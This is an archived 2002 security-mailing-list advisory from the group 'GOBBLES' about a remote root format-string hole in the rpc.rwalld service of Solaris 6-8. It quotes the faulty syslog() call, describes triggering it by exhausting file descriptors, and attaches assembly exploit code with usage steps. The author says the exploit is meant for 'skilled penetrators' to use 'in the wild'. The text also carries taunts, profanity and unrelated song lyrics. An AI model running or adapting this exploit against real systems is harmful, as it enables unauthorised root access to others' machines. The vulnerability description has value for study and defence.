Adivosry + Exploit for Remote Root Hole in Default Installation of Popular Commercial Operating System
Date: Tue, 30 Apr 2002 06:34:29 -0700
From: gobbles@hushmail.com
To: vulnwatch@vulnwatch.org, submissions@packetstormsecurity.org,
Subject: Adivosry + Exploit for Remote Root Hole in Default Installation of Popular Commercial Operating System
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
GOBBLES SECURITY ADVISORY #32
ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT!
Forward:
<@route> so was fydor trying to make his code unreadable when he write nmap?
<@route> or was that just the fallout of poor planning?
<@route> this is awful
<@route> if ( !victim || !sport || !dport || sd < 0) {
<@route> fprintf(stderr, "send_udp_raw: One or more of your parameters
suck!\n");
<@route> free(packet);
<@route> return -1;
<@route> }
<@route> This is the program that is used everywhere and written up in
countless books?
<@route> it's pretty much obscene that this program doesnt use libnet
Systems Affected:
Sun Solaris 6, Sun Solaris 7, Sun Solaris 8
(sparc and x86 versions)
Threat Level:
Super duper high.
Vendor Notification Status:
Initial advisory sent to Sun Microsystems on Friday, April 5th.
After long series of email exchange, Sun.com engineers finally begin working
on developing patch for bug.
Days later, CERT contact GOBBLES about bug. Dialouge happen then too with
CERT. Both Sun Microsystems and CERT have promised to make sure that
GOBBLES name is in both official advisories released. Hey, we do this for
fame and attention, now that we are no longer weaned we must do something!
Some time, full disclosure is real pain in ass. Everyone want more and more
time to get things fixed before advisory is released. Time to grace lists
with more GOBBLES Advisory.
Exploit:
A proof-of-concept exploit for this vulnerability has been attached to the
bottom of this email. GOBBLES wrote it in way to keep unskilled from using
it, like security assesment team from Vigilante who not able to tell if
vulnerability is real or not in opensourced product after reading advisory.
At the same time, skilled penetrators should not have any trouble using the
code provided to exploit systems in the wild.
Don't send GOBBLES email asking for other versions of exploit. Some things
better left private and given to close friends for their own motivations.
If you can't figure out how to work with this exploit and get remote root
from what is provided in the advisory, really there is no reason for you to
be using an exploit.
A Few Words:
There are some thing that GOBBLES have to say, some thing very heartfelt
that he need to communicate to the world, some thing that best said in song,
please take time to read lyric and understand what GOBBLES trying to say. . .
"the sun has blessed
the rays are gone
and all the kids have left their tears and gone home,
sweet 17, sour 29
and i can't explain myself
what i'd hoped to find
you were all so kind
when i was near,
and if you're still feeling down
then maybe you need me around
to love and hold you
don't say i hadn't told you so
maybe you need me around,
i had no luck
i had no shame
i had no cause
just seventeen days of rain
and you in my eyes,
just one more song to slay this earth
and i can't explain myself just what it's worth
what was all i had
but not all i'd need
and i can't escape the fact that i still bleed,
and if you're still feeling down
and if this seems way too loud
then maybe you need me around,
i had no voice
i had no drive
i had no choice
i've done my time
had myself
had my band
i had my love
had no hand in watching it all fall apart
and if you're still feeling down
then maybe you need me around
to lift and scold you
to send you crashing all right now
maybe you need me around."
- -Blissed and Gone, the Smashing Pumpkins
Description of Problem (Part One):
One of the default RPC services in Sun Solaris versions 6-8 is has an
insecure syslog() statement, which allow remote attacker to execute custom
code as root.
Hehe, GOBBLES bet you getting pissed because in all this length of advisory,
still no mention of what is vulnerable, hehehe, ;PPPPpppppppppppppppp. Keep
control of temper, and keep reading, because you about to find out, hehehe
GOBBLES is silly today.
Remotely Exploitable:
Yes.
Locally Exploitable:
Yes.
Privilage Attained After Exploitation:
Root.
Exploit Included:
As GOBBLES did mention previously, yes. It get you root. Girls will be
impressed with mailing list reading skills and source code leeching
technique utilized to gain remote root to Solaris machines. Included
exploit for Sparc.
Name of Vulnerable Service:
$ grep rwall /etc/inetd.conf
# The rwall server allows others to post messages to users on this machine.
walld/1 tli rpc/datagram_v wait root /usr/lib/netsvc/rwall/rpc.rwalld rpc.rwalld
It rwalld that vulnerable. It run as root. Attacker get root from
exploiting it.
Description of Problem (Part Two):
Inside rwall_subr.c we see:
/*
* Make sure the wall programs exists, is executeable, and runs
*/
if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
(fp = popen(WALL_PROG, "w")) == NULL) {
syslog(LOG_NOTICE,
"rwall message received but could not execute %s",
WALL_PROG);
syslog(LOG_NOTICE, msg);
Bug easy enough to spot, but now question is, "GOBBLES, friend, how is
this to be exploited? Faulty syslog() only called if rpc.rwalld can not
execute /usr/sbin/wall on local system, which mean it only exploitable if
admin have chmod -x or rm /usr/sbin/wall or something like this, right, so
why this so such a big deal?"
To this GOBBLES say, "Friend IDIOT, faulty syslog() is called if anything is
to make popen() fail, there one other way to exploit bug, which make it
dangerous and affect all installation of Solaris running rpc.rwalld, is that
popen() to fail if there no available file descriptors on system."
This easier to exploit locally on system. For remote exploitation, timing
is important and thus is race condition. Each new tcp session to running
service on target host will consume filedescriptor. Then run attached
exploit to have root handed over, like operator status given to route in
#phrack with no question ask.
Patch Available:
Fucked if GOBBLES knows.
Suggested Workaround:
GOBBLES suggest that admin disable rwalld from /etc/inetd.conf until patch
made available, then restart it, if you wait until patch available until
upgrade you probably have to do upgrade by reinstalling operating system,
because now exploit out and probably in hands of less than ethical
penetrator looking to abuse you in one way or another.
Security Candy:
- -begin copy-
/*
Remote Root Exploit for Solaris 6-8 rpc.walld
Usage Instructions:
1. Compile.
gcc -o xwall xwall.s
2. Run.
(./xwall ; ./shellcode) | rwall victim
3. Late Easter egg.
strings xwall
Note(s):
Something else must be done to consume FD's on
victim system. Figure this one out for self.
This exploit written to be run on Linux. Supplied
format string is for Sparc Solaris. Provide own
remote shellcode and use as above described.
Love,
GOBBLES Security
http://www.bugtraq.org
GOBBLES@hushmail.com
*/
retloc:
.long 0x41424344
retaddr:
.long 0x60bb135
padding:
.long 4
walkcount:
.long 1
.globl main
.type main,@function
main:
pusha
movl (padding),%ecx
jusfhds7fg:
pushl %ecx
movl $4,%eax
movl $1,%ebx
pushl $0x00000041
movl %esp,%ecx
movl $1,%edx
int $0x80
popl %ecx
popl %ecx
loop jusfhds7fg
movl %esp,24(%esp)
pushl $0x42424242
movl $4,%edx
movl %esp,%ecx
movl $1,%ebx
movl $4,%eax
int $0x80
movl (retloc),%eax
bswapl %eax
pushl %eax
subl $4,%ecx
movl %edx,%eax
int $0x80
addl $4,%ecx
movl %edx,%eax
int $0x80
subl $4,%ecx
popl %eax
bswapl %eax
incl %eax
incl %eax
bswapl %eax
pushl %eax
movl %edx,%eax
int $0x80
popl %eax
movl %esp,%edx
incl %edx
xorl %esi,101(%ebp)
andb %al,111(%edx)
popa
pushl %edx
andb %al,97(%ebx)
decl %esi
aaa
andb %al,111(%ebx)
incl %esp
xorl (%ecx),%eax
movl (walkcount),%ecx
cmpl $0,%ecx
je nczxhczjcg89zg89
pushl %ecx
movl $4,%edx
movl $1,%ebx
pushl $0x78382e25
cmzxnczxcz8c:
pushl %ecx
movl %esp,%ecx
addl $4,%ecx
movl $4,%eax
int $0x80
popl %ecx
loop cmzxnczxcz8c
popl %ecx
popl %ecx
nczxhczjcg89zg89:
movl (retaddr),%edx
pushl %edx
shr $16,%edx
subl %edx,(%esp)
movw $0,2(%esp)
pushl %edx
shll $3,%ecx
subl %ecx,(%esp)
movl (padding),%edx
subl %edx,(%esp)
subl $16,(%esp)
movw $0,2(%esp)
pushl $cznxczxczxh8
call printf
movl $1,%eax
int $0x80
cznxczxczxh8:
.string "%%%uc%%hn%%%uc%%hn\n"
- -begin paste-
Greets:
route, because route deserves attention, use libnet it rulez. route, why
you refuse GOBBLES interview on supposed intrusion on @stake subnet that was
allowed when some malicious local user ran trojaned blackhat warez? GOBBLES
need to confirm with you if this really did happen, please respond soon...
Tracy@mp3.com, the Official Sysadmin Mascot of GOBBLES Security. Thanks for
letting GOBBLES know to cut out the "leet gr33tz" from advisory, now people
hold lots of respect for GOBBLES. Thanks Tracy, you're a peach. Next
advisory will be disclosure of 0day CSS holes in mp3.com's website...
w00w00 Security Development, publishing advisories at the blinding speed of
1 per 3 years, and still being the largest active nonprofit security group in
the world, to the eyes of the public. Disclosure is good when it serve a
political agenda, hehehehe...
The Securityfocus Staff, who often reject the legitimate research materials
of GOBBLES from their lists, but make sure they archive it on their website
anyways. Thanks for at least giving us some of the credit that we deserve.
In the future, though, if our submissions don't meet your requirements for
publication on the lists, don't put them on your website. Enough of this
double standards bullshit.
zen-parse, for defining what a whitehat is -- no skill, no ethic, no respect.
and finally, the beautiful Jennifer Garner, who play Sydney Bristow in tv
show Alias, who many member of GOBBLES Security is in love with. You win free
GOBBLES Security tshirt, come to defcon in August to get it, hehehehehehe!
Hush provide the worlds most secure, easy to use online applications - which solution is right for you?
HushMail Secure Email http://www.hushmail.com/
HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/
Hush Business - security for your Business http://www.hush.com/
Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/
Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wlwEARECABwFAjzOnwwVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPt4sA
n0+78j2dzLIufxrdL5A8GcqG/ZPnAKCAnpQVJKw3PYNFN9fFjEfBcGCruQ==
=jCTV
-----END PGP SIGNATURE-----